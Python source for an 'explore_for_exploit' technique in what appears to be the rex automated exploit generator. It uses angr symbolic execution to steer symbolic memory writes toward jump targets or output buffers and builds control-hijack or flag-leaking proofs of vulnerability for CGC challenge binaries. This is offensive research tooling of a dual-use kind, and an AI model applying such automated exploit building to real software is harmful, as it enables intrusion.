import logging
import rex.crash
import rex.exploit.cgc.type2.cgc_type2_general
from rex import Vulnerability
from rex.exploit import CannotExploit
from ..technique import Technique

import claripy
import angr


l = logging.getLogger("rex.exploit.techniques.explore_for_exploit")


class WriteInfo(object):
    """
    Record of a single write to a symbolic address.

    Stores the address expression, the data written, the bounds of the address,
    the concrete location assigned to the write and the MemRange it was grouped into.
    """

    def __init__(self, addr, data, min_addr, max_addr, assigned_loc, mem_range):
        self.addr, self.data = addr, data
        self.min_addr, self.max_addr = min_addr, max_addr
        self.assigned_loc, self.mem_range = assigned_loc, mem_range


class ReadInfo(object):
    """
    Record of a single read from a symbolic address.

    Mirrors WriteInfo, except that the value read is kept under `data_expr`.
    """

    def __init__(self, addr, data, min_addr, max_addr, assigned_loc, mem_range):
        self.addr, self.data_expr = addr, data
        self.min_addr, self.max_addr = min_addr, max_addr
        self.assigned_loc, self.mem_range = assigned_loc, mem_range


class MemRange(object):
    """
    A group of symbolic addresses that live at fixed offsets from `start_addr`.

    `assigned_start` is the location handed to the range's start address;
    `min_start`/`max_start` begin at 0 and are filled in by whoever creates the range.
    """

    def __init__(self, start_addr, assigned_start):
        self.start_addr, self.assigned_start = start_addr, assigned_start
        self.min_start = self.max_start = 0
        # offset -> data stored at that offset
        self.offset_to_data = {}
        # hashes of every address expression known to belong to this range
        self.all_addr_keys = set()
        self.all_addr_keys.add(start_addr.hash())


class AttackAddr(object):
    """
    An address worth overwriting.

    When `goal_start`/`goal_end` are given they bound the value that should end up
    at `addr`; when they are left as None no particular value is requested.
    """

    def __init__(self, addr, goal_start=None, goal_end=None):
        self.addr = addr
        self.goal_start, self.goal_end = goal_start, goal_end


# We do a lot of extra solves to check whether an address must sit at a constant offset from a known range.
# The alternative would be to constrain addresses to their assigned values up front.
# However, with a small out-of-bounds write, we could end up overwriting things before we really want to.
# This needs more thought; the concern may turn out to be unfounded.
# TODO: what about a shadow stack and 2 writes? Or 1 write but other things to attack, such as a leak?
# TODO: what about finding how to go from ip control to more control, i.e. which gadget works?

class SimAddressTracker(angr.state_plugins.SimStatePlugin):
    """
    This state plugin keeps track of the reads and writes to symbolic addresses.

    Symbolic addresses are grouped into MemRange objects: an address that the solver
    proves to be at one single offset from an existing range's start joins that range,
    any other address opens a new range. Every new range is handed its own placeholder
    location, taken from `data_loc`, which then advances by `_RANGE_STRIDE`.
    """

    # distance between the placeholder locations of two consecutive ranges
    _RANGE_STRIDE = 0x10000
    # addresses are handled as 32-bit values when they are shifted by an offset
    _ADDR_MASK = 0xffffffff

    def __init__(self):
        angr.state_plugins.SimStatePlugin.__init__(self)

        # data
        self.writes = []
        self.data_loc = 0x10000
        self.reads = []
        self.mem_ranges = []
        self.addresses_written = set()
        self.addrs_to_attack = []
        self.read_replacements = dict()
        self.read_constraints = []

    def _match_range(self, addr, state):
        """
        Look for a known range that `addr` is pinned to.

        :return: (mem_range, offset) for the first range where `start_addr - addr`
                 has exactly one solution, or None when there is no such range
        """
        for mem_range in self.mem_ranges:
            # todo optimize, maybe check AST.variables
            two_nums = state.solver.eval_upto(mem_range.start_addr - addr, 2)
            if len(two_nums) == 1:
                return mem_range, two_nums[0]
        return None

    def _join_range(self, addr, mem_range, offset):
        """
        Register `addr` as a member of `mem_range` at the given offset.

        :return: (assigned location, min address, max address)
        """
        mask = self._ADDR_MASK
        # the offset is an unsigned solver value, so all three results have to be wrapped
        # the same way; an unmasked location goes negative when addr is past the start
        assigned = (mem_range.assigned_start - offset) & mask
        min_addr = (mem_range.min_start - offset) & mask
        max_addr = (mem_range.max_start - offset) & mask
        mem_range.all_addr_keys.add(addr.hash())
        return assigned, min_addr, max_addr

    def _open_range(self, addr, state, kind):
        """
        Create a new range starting at `addr`; `kind` ("write"/"read") is only used for logging.

        :return: (mem_range, min address, max address)
        """
        # okay we need to do the long solve
        min_addr = state.solver.min(addr)
        max_addr = state.solver.max(addr)
        l.debug("new %s with min: %#x, max: %#x", kind, min_addr, max_addr)

        # we didn't find a range it belongs to, we add one
        assigned = self.data_loc
        mem_range = MemRange(addr, assigned)
        mem_range.min_start = min_addr
        mem_range.max_start = max_addr
        self.mem_ranges.append(mem_range)
        l.debug("assigned range %#x for %s to addr", assigned, kind)
        self.data_loc += self._RANGE_STRIDE

        # remove all the "addresses written" that fall inside the range
        self.addresses_written = set(x for x in self.addresses_written if x < min_addr or x > max_addr)
        return mem_range, min_addr, max_addr

    def assign_write(self, addr, data, state):
        """
        Record a write of `data` to the symbolic address `addr`.

        :param addr:  the symbolic address expression being written
        :param data:  the expression being stored
        :param state: the state whose solver is used to reason about `addr`
        :return:      the location assigned to this write
        """
        l.debug("assigning write")

        # check if it can only be assigned one address
        match = self._match_range(addr, state)
        if match is not None:
            mem_range, offset = match
            l.debug("found a matching range for var write")
            assigned, min_addr, max_addr = self._join_range(addr, mem_range, offset)
            mem_range.offset_to_data[offset] = data
        else:
            mem_range, min_addr, max_addr = self._open_range(addr, state, "write")
            assigned = mem_range.assigned_start
            mem_range.offset_to_data[0] = data

        self.writes.append(WriteInfo(addr, data, min_addr, max_addr, assigned, mem_range))
        return assigned

    # TODO this is unused
    def assign_read(self, addr, data, state):
        """
        Record a read of `data` from the symbolic address `addr`.

        Same bookkeeping as assign_write, except that nothing is stored in the
        range's `offset_to_data`.

        :return: the location assigned to this read
        """
        l.debug("assigning read")

        # check if it can only be assigned one address
        match = self._match_range(addr, state)
        if match is not None:
            mem_range, offset = match
            l.debug("found a matching range for var read")
            assigned, min_addr, max_addr = self._join_range(addr, mem_range, offset)
        else:
            mem_range, min_addr, max_addr = self._open_range(addr, state, "read")
            assigned = mem_range.assigned_start

        self.reads.append(ReadInfo(addr, data, min_addr, max_addr, assigned, mem_range))
        return assigned

    @angr.state_plugins.SimStatePlugin.memo
    def copy(self, memo):
        """
        Duplicate the tracker for a new state.

        The containers are copied, the WriteInfo/ReadInfo/MemRange objects inside them
        are shared with the original.
        """
        s = SimAddressTracker()
        s.writes = list(self.writes)
        # carry the allocation cursor over, otherwise the copy would hand the placeholder
        # of an already existing range to the next range it opens
        s.data_loc = self.data_loc
        s.reads = list(self.reads)
        s.mem_ranges = list(self.mem_ranges)
        s.addresses_written = set(self.addresses_written)
        s.addrs_to_attack = list(self.addrs_to_attack)
        s.read_replacements = dict(self.read_replacements)
        s.read_constraints = list(self.read_constraints)
        return s


class ExploreForExploit(Technique):
    """
    Technique that symbolically explores from a state before the crash, tracking
    writes to symbolic addresses, and tries to turn them into an exploit by pointing
    a write at an address that later influences a jump target or a transmit buffer.
    """

    name = "explore_for_exploit"

    applicable_to = ['cgc']

    # not referenced in the visible part of this file
    cgc_registers = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

    # syscall_hook asks for leaked pointers to land in [FLAG_PAGE, FLAG_PAGE+0x500]
    FLAG_PAGE = 0x4347c000

    # not referenced in the visible part of this file -- presumably read elsewhere, verify
    bitmask_threshold = 20

    generates_pov = True

    # this technique could create pov's of either type
    # (attack() sets it to 1 or 2 once an exploit has been built)
    pov_type = None

    def __init__(self, crash, rop, shellcode):
        """Forward `crash`, `rop` and `shellcode` unchanged to the Technique constructor."""
        super(ExploreForExploit, self).__init__(crash, rop, shellcode)

    @staticmethod
    def _get_writable_pages(state):
        last_addr = -1
        curr_start = -1
        ranges = []
        for page_num, page in sorted(state.memory._pages.items(), key=lambda x:x[0]):
            if not state.solver.eval(page.permission_bits) & 0x2:
                continue
            page_addr = page_num*0x1000
            if page_addr != last_addr:
                if last_addr != -1:
                    ranges.append((curr_start, last_addr))
                curr_start = page_addr
            last_addr = page_addr + 0x1000
        if last_addr != -1:
            ranges.append((curr_start, last_addr))
        return ranges


    @staticmethod
    def is_writable_and_mapped(addr, state):
        try:
            permissions = state.solver.eval(state.memory.permissions(addr))
            return (permissions & 2) != 0
        except KeyError:
            return False
        except angr.SimMemoryError:
            return False

    @staticmethod
    def mem_write_hook(state):
        addr = state.inspect.mem_write_address
        # length = state.inspect.mem_write_length  # seems to be None
        expr = state.inspect.mem_write_expr

        if any(v.startswith("sim_mem") for v in addr.variables):
            l.warning("Found possible arbitrary write. To be implemented.")
            #TODO

        # well this is expensive but I want to know the range
        two_addrs = state.solver.eval_upto(addr, 2)
        if len(two_addrs) == 0:
            l.warning("no solutions while trying to get 2 addrs")
            return
        if not state.solver.symbolic(addr) or len(two_addrs) == 1:
            state.get_plugin("address_tracker").addresses_written.add(two_addrs[0])
            return

        # todo how symbolic is the data, do we care?

        converted = state.get_plugin("address_tracker").assign_write(addr, expr, state)
        state.inspect.mem_write_address = converted

    @staticmethod
    def exit_hook(state):
        exit_target = state.inspect.exit_target
        if any(v.startswith("sim_mem") for v in exit_target.variables):
            l.debug("found possible target to overwrite at ip %#x", state.solver.eval(state.regs.ip))
            for v in exit_target.variables:
                if v.startswith("sim_mem"):
                    addr = int(v.replace("sim_mem_", "").split("_")[0], 16)
                    a_addr = AttackAddr(addr)
                    state.get_plugin("address_tracker").addrs_to_attack.append(a_addr)
                    break

    @staticmethod
    def syscall_hook(state):
        syscall_name = state.inspect.syscall_name
        if syscall_name == "transmit":
            # todo do we care about count
            # count = state.solver.eval(state.regs.edx)
            buf = state.regs.ecx
            fd = state.solver.eval(state.regs.ebx)
            if fd != 0 and fd != 1:
                l.warning("weird fd value: %d", fd)
                return
            for v in buf.variables:
                if v.startswith("sim_mem"):
                    addr = int(v.replace("sim_mem_", "").split("_")[0], 16)
                    a_addr = AttackAddr(addr,
                                        goal_start=ExploreForExploit.FLAG_PAGE,
                                        goal_end=ExploreForExploit.FLAG_PAGE+0x500)
                    state.get_plugin("address_tracker").addrs_to_attack.append(a_addr)
                    l.debug("found possible addr to attack to leak: %#x", addr)
                    break
        # could maybe do stuff with receive too?
        # also could look for stuff like strcpy where we can eventually concretize the result from the output

    def mem_read_hook_after(self, state):
        addr = state.inspect.mem_read_address
        data = state.inspect.mem_read_expr
        concrete_addr = state.solver.eval(addr)
        writable = self.is_writable_and_mapped(concrete_addr, state)
        # TODO maybe the right way is to create a new path and re-execute each time we see one of these
        # todo 2 modes re-execute for every possible thing read, or re-execute only if a mem-loc goes to ip
        # check if it's writable and has not been overwritten
        if writable and concrete_addr not in state.get_plugin("address_tracker").addresses_written and \
                len(state.get_plugin("address_tracker").writes) > 0 and \
                any(write.min_addr <= concrete_addr <= write.max_addr
                    for write in state.get_plugin("address_tracker").writes):
            # get a variable representing that memory loc
            replacement = state.solver.BVS("sim_mem_" + hex(concrete_addr).replace("L",""), len(data))
            state.inspect.mem_read_expr = replacement

            state.add_constraints(replacement == data)

            state.get_plugin("address_tracker").read_constraints.append(replacement == data)
            state.get_plugin("address_tracker").read_replacements[replacement.hash()] = data

    @staticmethod
    def addr_analyze(addr, state):
        if not state.solver.symbolic(addr):
            return addr
        # well this is expensive but I want to know the range
        min_addr = state.solver.min(addr)
        max_addr = state.solver.max(addr)
        if min_addr == max_addr:
            return addr
        return addr

    def which_bytes_2(self, out_data):
        byte_map = dict()
        for i, byte in enumerate(out_data.chop(8)):
            # we only handle the simple stuff
            # TODO dump to colorguard
            if len(byte.variables) == 1 and byte.op == "BVS":
                byte_index = int(list(byte.variables)[0].split("_")[0].split("-")[-1])
                byte_map[i] = byte_index
        curr = -1
        best_length = 0
        best_start = -1
        prev = -1
        # iterate +1 to handle the end of the loop for free
        for i in range(out_data.size()//8 + 1):
            if i in byte_map and (prev == -1 or byte_map[i]-1 == prev):
                if curr == -1:
                    curr = i
                prev = byte_map[i]
            else:
                if curr != -1:
                    length = i - curr
                    if length > best_length:
                        best_start = curr
                        best_length = length
                curr = -1
                prev = -1

        if best_start == -1:
            return None
        return best_start

    def attack(self, path, write_addrs, initial_state):
        """
        Try to build an exploit by steering the tracked symbolic writes of `path`.

        For every entry of `write_addrs` a tracked write is constrained to hit that
        address (and, when the entry has a goal range, to store a value inside it).
        All remaining tracked writes and reads are constrained to writable memory.
        A copy of `initial_state` carrying these constraints is then stepped along the
        basic blocks `path` took, and the resulting state is turned into an exploit.

        :param path:          state found during exploration; its history and its
                              "address_tracker" plugin are used
        :param write_addrs:   list of AttackAddr objects to overwrite (may be empty)
        :param initial_state: state to restart from; it is copied before being modified
        :return:              an exploit object, or None when any step fails
        """
        # todo replace warning/return None with exception that is caught and printed
        # todo split up this function
        l.debug("attacking path %s at addrs %s", path, [hex(x.addr) for x in write_addrs])
        # the basic block trace that the re-execution below has to reproduce
        addrs = path.history.bbl_addrs.hardcopy
        initial_state = initial_state.copy()
        # work on a copy so that dropping writes/reads below does not touch the path's plugin
        addr_tracker = path.get_plugin("address_tracker").copy()
        # initial_state.register_plugin("address_tracker", path.get_plugin("address_tracker").copy())
        # TODO how to do this, follow same path? explore? dump for the crash fuzzer?

        # add the read constraints so we can use the symbolic variables from the previous run
        for c in addr_tracker.read_constraints:
            initial_state.add_constraints(c)

        # FIXME what about looking at all the writes we have, and what they overwrite? like we would prefer a 4 byte
        # FIXME write over a return address than an 8 byte write that kills a canary
        # TODO we should consider ranges when picking writes, and try to avoid overwriting non-const values
        # TODO maybe we need to look at other ways of doing this, overwrite size, overwriting an additional regsiter
        # TODO what about writes that are concretized by concretizing the first write?

        # pick writes
        # exploit_type: 0 = undecided, 1 = plain overwrite, 2 = overwrite with a value in a goal range
        exploit_type = 0
        for write_addr in write_addrs:
            found = False
            for write in list(addr_tracker.writes):
                if write.min_addr <= write_addr.addr <= write.max_addr:
                    l.debug("trying to satisfy write")
                    if initial_state.solver.satisfiable(extra_constraints=(write.addr == write_addr.addr,)):
                        if write_addr.goal_start is None:
                            l.debug("found a satisfiable write for addr %#x", write_addr.addr)
                            initial_state.add_constraints(write.addr == write_addr.addr)
                            found = True
                            exploit_type = 1
                        else:
                            constraints = list()
                            # todo we should concretize this further, it's a huge range of values...
                            constraints.append(write.addr == write_addr.addr)
                            constraints.append(write.data >= write_addr.goal_start)
                            constraints.append(write.data <= write_addr.goal_end)
                            if initial_state.solver.satisfiable(extra_constraints=constraints):
                                found = True
                                initial_state.add_constraints(*constraints)
                                # pin the written value to one concrete solution inside the goal range
                                initial_state.add_constraints(write.data == initial_state.solver.eval(write.data))
                                exploit_type = 2
                        if found:
                            # remove all writes/reads from the same mem_range
                            addr_tracker.writes = [a for a in addr_tracker.writes if a.mem_range != write.mem_range]
                            addr_tracker.reads = [a for a in addr_tracker.reads if a.mem_range != write.mem_range]
                            found = True
                            break
            if not found:
                l.warning("couldn't write to addr %#x", write_addr.addr)
                return None

        # nothing was requested (empty write_addrs): treat it like a plain overwrite
        if exploit_type == 0:
            exploit_type = 1

        # use up the rest of the writes and reads
        l.debug("%d writes remaining", len(addr_tracker.writes))
        l.debug("%d reads remaining", len(addr_tracker.reads))
        # todo the extra addresses
        # todo consider the end size + the region as a whole
        # todo maybe want to aim somewhere past in case of cheap ASLR
        remaining = addr_tracker.writes + addr_tracker.reads

        # every leftover access must fall inside one of the writable ranges
        writable_ranges = self._get_writable_pages(initial_state)
        for addr in remaining:
            constraint = initial_state.solver.Or(*(initial_state.solver.And(r[0] <= addr.addr, addr.addr < r[1]) for r in writable_ranges))
            initial_state.add_constraints(constraint)

        if not initial_state.solver.satisfiable():
            return None

        # ask for one solution that fixes all leftover addresses at once
        l.debug("Running batch eval")
        try:
            solns = initial_state.solver._solver.batch_eval(tuple(addr.addr for addr in remaining), 1)
        except claripy.UnsatError:
            return None

        if len(solns) == 0:
            l.warning("couldn't point them all at writable locations :(")
            return None

        # now add the exact constraints
        soln = solns[0]
        for concrete, addr in zip(soln, remaining):
            initial_state.add_constraints(concrete == addr.addr)

        # todo wtf do I do about unicorn. Maybe only track branches with a symbolic guard??
        # todo pt.2 do we still need to discard unicorn now that we're being smart about it
        # number of entries of addrs already matched; check_path reads the current value
        last_checked = 0
        initial_state.options.discard(angr.options.UNICORN)

        def check_path(state):
            # True when the blocks the state just executed differ from the recorded trace
            suffix = state.history.recent_bbl_addrs
            return suffix != addrs[last_checked:last_checked+len(suffix)]

        pg = self.crash.project.factory.simulation_manager(initial_state, save_unconstrained=True)
        prev = None
        # todo do we really want to follow the same path? maybe
        while len(pg.active) > 0 and len(pg.one_active.history.bbl_addrs.hardcopy) < len(addrs):
            l.debug("light-tracing: %s", pg.active)
            # states that left the recorded trace go to the 'missed' stash
            pg.move('active', 'missed', check_path)
            if len(pg.active) == 0:
                l.warning("WTF misfollow error")
                return None

            prev = pg.active[0]
            last_checked += len(prev.history.recent_bbl_addrs)
            pg.step()

        # create exploit
        if len(pg.unconstrained) == 0 and exploit_type == 1:
            # TODO signal failure or success
            l.warning("attack failed, simgr: %s", pg)
            return None
        elif exploit_type == 2:
            # we need to step one more to have the flag in stdout
            pg.step()
            pg.prune()
            if len(pg.active) == 0:
                l.warning("Error: no paths made it")
                return None
            stdout_len = pg.active[0].posix.fd[1].write_pos
            out_data = pg.active[0].posix.fd[1].write_storage.load(0, stdout_len)
            # verify flag data is in stdout
            if not any(v.startswith("cgc-flag") for v in out_data.variables):
                l.warning("Error: flag data not in stdout")
                return None

            # craft leaking exploit
            start = self.which_bytes_2(out_data)
            if start is None:
                return None
            l.debug("making crash object")
            crash_state = pg.active[0]
            crash = rex.crash.Crash(self.crash.target, crash=self.crash.crash_input, pov_file=self.crash.pov_file,
                                    crash_state=crash_state, prev_state=prev, rop_cache_path=self.crash._rop_cache_path)
            exploit = rex.exploit.cgc.type2.cgc_type2_general.CGCType2GeneralExploit(
                    method_name='exploration', crash=crash, input_str=crash_state.posix.dumps(0),
                    output_index=start, bypasses_nx=True, bypasses_aslr=False)
            self.pov_type = 2
            return exploit

        # plain overwrite: build a new crash from the first unconstrained state
        crash_state = pg.unconstrained[0]
        # hack to avoid exploring again!
        # (check() refuses crashes whose state globals contain this key)
        crash_state.globals["DONT_EXPLORE"] = True
        l.debug("making crash object")
        crash = rex.crash.Crash(self.crash.target, crash=self.crash.crash_input, pov_file=self.crash.pov_file,
                                crash_state=crash_state, prev_state=prev, rop_cache_path=self.crash._rop_cache_path)
        try:
            exploit_factory = crash.exploit()
            # a type 1 exploit is preferred over a type 2 one
            if exploit_factory.best_type1 is not None:
                self.pov_type = 1
                return exploit_factory.best_type1
            if exploit_factory.best_type2 is not None:
                self.pov_type = 2
                return exploit_factory.best_type2
        except CannotExploit as e:
            l.warning("could not exploit: %s", e)

        l.debug("didn't succeed")
        return None

    def check(self):
        """
        Decide whether this technique may be applied to the crash.

        :return: True for a WRITE_WHAT_WHERE crash whose state globals do not contain
                 "DONT_EXPLORE"; otherwise the reason is reported through
                 check_fail_reason and False is returned
        """
        if not self.crash.one_of(Vulnerability.WRITE_WHAT_WHERE):
            reason = "Can only apply explore for exploit technique to ip overwrite vulnerabilities."
        elif "DONT_EXPLORE" in self.crash.state.globals:
            reason = "Already explored this crash."
        else:
            return True

        self.check_fail_reason(reason)
        return False

    def apply(self, **kwargs):
        """
        Explore forward from a state before the crash, looking for something to attack.

        The second-to-last predecessor of the crash is stripped of its preconstraints
        and of the constraints pinning single cgc-flag variables to concrete values.
        A copy of it, instrumented with this class's hooks and a SimAddressTracker,
        is stepped; every address the hooks queue for a state is handed to attack(),
        and so is every unconstrained state.

        :param kwargs: accepted for interface compatibility, not used
        :return:       the first exploit attack() produces, or None once no active
                       state is left
        """
        # TODO figure out why I need to go back this far to be before the crash
        # TODO While executing keep things as variables that were read from memory with a constraint that it is equal
        # TODO then we try removing the constraint if it is ever used for a control flow transfer
        # TODO might need to reexecute with the constraint removed, might have constraints on memory e.g. there is a call before where we jump

        initial_state = self.crash._t.predecessors[-2].copy()
        initial_state.history.trim()

        # remove preconstraints
        initial_state.preconstrainer.remove_preconstraints()

        # Todo think about this more...
        # remove flag constraint
        # (drops `<cgc-flag variable> == <concrete>` in either operand order)
        new_constraints = [c for c in initial_state.solver.constraints
            if not (c.op == '__eq__' and c.args[0].op == 'BVS' and not c.args[1].symbolic and
                len(c.variables) == 1 and next(iter(c.variables)).startswith('cgc-flag'))
            and not (c.op == '__eq__' and c.args[1].op == 'BVS' and not c.args[0].symbolic and
                len(c.variables) == 1 and next(iter(c.variables)).startswith('cgc-flag'))
        ]

        # start over with a fresh solver holding only the constraints that were kept
        initial_state.release_plugin('solver')
        initial_state.add_constraints(*new_constraints)
        l.debug("downsizing unpreconstrained state")
        initial_state.downsize()
        l.debug("simplifying solver")
        initial_state.solver.simplify()
        l.debug("simplification done")
        initial_state.solver._solver.result = None
        # done removing

        start_state = initial_state.copy()
        start_state.release_plugin("zen_plugin")
        start_state.release_plugin("chall_resp_info")
        start_state.options.discard(angr.options.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)
        start_state.options.add(angr.options.TRACK_JMP_ACTIONS)
        # start_state.inspect.b(
        #        'address_concretization',
        #        angr.BP_BEFORE,
        #        action=self.addr_concretization)

        # set some breakpoints
        start_state.inspect.b(
            'mem_write',
            angr.BP_BEFORE,
            action=self.mem_write_hook
        )

        start_state.inspect.b(
            'mem_read',
            angr.BP_AFTER,
            action=self.mem_read_hook_after
        )

        start_state.inspect.b(
            'exit',
            angr.BP_BEFORE,
            action=self.exit_hook
        )

        start_state.inspect.b(
            'syscall',
            angr.BP_BEFORE,
            action=self.syscall_hook
        )

        # force it to only pick one address
        start_state.memory._default_read_strategy = ["any"]
        start_state.memory._default_write_strategy = ["any"]


        # todo wtf do I do about unicorn. Maybe only track branches with a symbolic guard??
        try:
            start_state.options.discard(angr.options.UNICORN)
        except AttributeError:
            pass

        # remove lazy solves
        start_state.options.discard(angr.options.LAZY_SOLVES)

        # add the plugin
        start_state.register_plugin("address_tracker", SimAddressTracker())

        # make sure solver doesn't solve for long
        start_state.solver._solver.timeout = 15000

        pg = self.crash.project.factory.simulation_manager(start_state, save_unconstrained=True)
        step_num = 0
        while len(pg.active) > 0:
            pg.step()
            step_num += 1
            if step_num % 10 == 0:
                l.debug("stepping %s", pg)

            # the errored stash holds error records (see the `.error` access below), not
            # states, so take the state out of each record before using state APIs on it
            errored_states = [record.state for record in pg.errored]
            for x in pg.active + pg.deadended + pg.unconstrained + errored_states:
                for addr in x.get_plugin("address_tracker").addrs_to_attack:
                    exploit = self.attack(x, [addr], initial_state.copy())
                    if exploit is not None:
                        return exploit
                # reset the list of addrs to attack
                x.get_plugin("address_tracker").addrs_to_attack = []
            for x in pg.unconstrained:
                # TODO make tests
                # we've found an unconstrained path simply by not messing something up
                # here we can attack it by constraining addrs to not be bad
                exploit = self.attack(x, [], initial_state.copy())
                if exploit is not None:
                    return exploit
            for x in pg.errored:
                l.warning("errored path: %s", x.error)
            # everything in these stashes has been examined, keep only the active states
            pg.drop(stash="unconstrained")
            pg.drop(stash="deadended")
            del pg.errored[:]

        l.warning("out of paths!")
        # here we will try to save the idea of control that we have
        # and see if we can use it later?

        # okay I want to single step up until the crashing action
        # then track the crashing action and see when it can be used
